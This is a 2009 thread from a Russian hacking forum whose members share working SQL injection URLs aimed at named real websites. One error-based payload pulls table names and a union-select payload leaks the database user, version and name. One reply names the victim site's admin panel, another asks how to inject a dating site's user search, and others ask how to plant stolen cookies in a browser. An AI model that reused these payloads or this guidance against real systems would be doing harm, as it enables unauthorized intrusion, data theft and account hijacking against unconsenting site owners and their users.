Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|

26.11.2009, 23:08
|
|
Постоянный
Регистрация: 15.06.2007
Сообщений: 527
Провел на форуме: 1734541
Репутация:
214
|
|
Сообщение от ElteRUS
http://www.wearhouse.ru/?page=item&id=125/**/and/**/1=(select/**/*/**/from(select/**/*/**/from(select/**/name_const((select/**/table_name/**/
from/**/information_schema.tables/**/limit/**/0,1),14)d)/**/as/**/t/**/join/**/(select/**/name_const((select/**/table_name/**/from/**/information_schema.tables/**/limit/**/0,1),14)e)b)a)--+
Вывод нужной инфы происходит в ошибку, смотри внимательно. Описание этого метода здесь https://forum.antichat.ru/threadnav119047-2-10.html
тут как я понял name_const
для этого дела заюзал
https://forum.antichat.ru/thread148915.html
помогло.результат был получен.
Спасибо Pashkela
|
|
|

27.11.2009, 00:05
|
|
Познающий
Регистрация: 14.03.2009
Сообщений: 38
Провел на форуме: 250929
Репутация:
2
|
|
вообщем нашёл скулю в одном сайте но вот до админки никак не добраться
собственно вопрос куда дальше идти?и как действовать,новичёк в этом деле
Код:
http://www.tltinfo.ru/index.php?id=3999+and+0+union+select+0,1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11/*
|
|
|

27.11.2009, 11:28
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме: 1179199
Репутация:
127
|
|
Админка тут: http://www.tltinfo.ru/admin.php
|
|
|

27.11.2009, 17:34
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме: 3244717
Репутация:
1980
|
|
http://sucuri.net/?page=docs&title=webapp-version-detection
|
|
|

27.11.2009, 23:13
|
|
Участник форума
Регистрация: 07.08.2008
Сообщений: 281
Провел на форуме: 3300342
Репутация:
165
|
|
Есть поиск юзеров на сайте знакомств, поиск по нику, если задать, допустим "Ната", то выведет всех юзеров, чьи имена начинаются на "Ната", а если задать пустое значение, то не чего не выводит скрипт, а если поставить символ "%", то выводит обсалютно всех озеров, т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
|
|
|

27.11.2009, 23:17
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
Сообщение от SeNaP
Есть поиск юзеров на сайте знакомств, поиск по нику, если задать, допустим "Ната", то выведет всех юзеров, чьи имена начинаются на "Ната", а если задать пустое значение, то не чего не выводит скрипт, а если поставить символ "%", то выводит обсалютно всех озеров, т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
Это не форум телепатов, давайте ссылку если хотите что бы вас вопрос не игнорировали.
|
|
|

28.11.2009, 03:00
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме: 125847
Репутация:
5
|
|
Подскажите плз браузер в который легко подставлять куки
Последний раз редактировалось Totgeliebt; 28.11.2009 в 03:43..
|
|
|

28.11.2009, 03:47
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме: 143706
Репутация:
-1
|
|
Сообщение от Totgeliebt
Подскажите плз браузер в который легко подставлять куки
Firefox...тебе нужна сборка FireFox Portable Edition
Там есть такой,как Tamper Data.В нём нажимаешь Запустить перехват,то плагин сам не вырубаешь.Делаешь гет/пост/куки/иной неебический запрос,после чего управляешь процессом...(перехватываешь ,прерываешь запросы или не вмешиваешься в работу).
|
|
|

28.11.2009, 03:48
|
|
Участник форума
Регистрация: 10.10.2009
Сообщений: 133
Провел на форуме: 143706
Репутация:
-1
|
|
Сообщение от SeNaP
т.е. там вродебы идёт сравнивание оператором LIKE.
Возможно ли как нибуть провести SQL-inj?
Вроде бы ? Что-то не догнал такую схему...Или сплю уже.Другие символы не выдают того же ?
|
|
|

28.11.2009, 04:07
|
|
Познающий
Регистрация: 20.10.2009
Сообщений: 38
Провел на форуме: 125847
Репутация:
5
|
|
а в оперу можно подсатвить как-нибудь чужие куки?
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|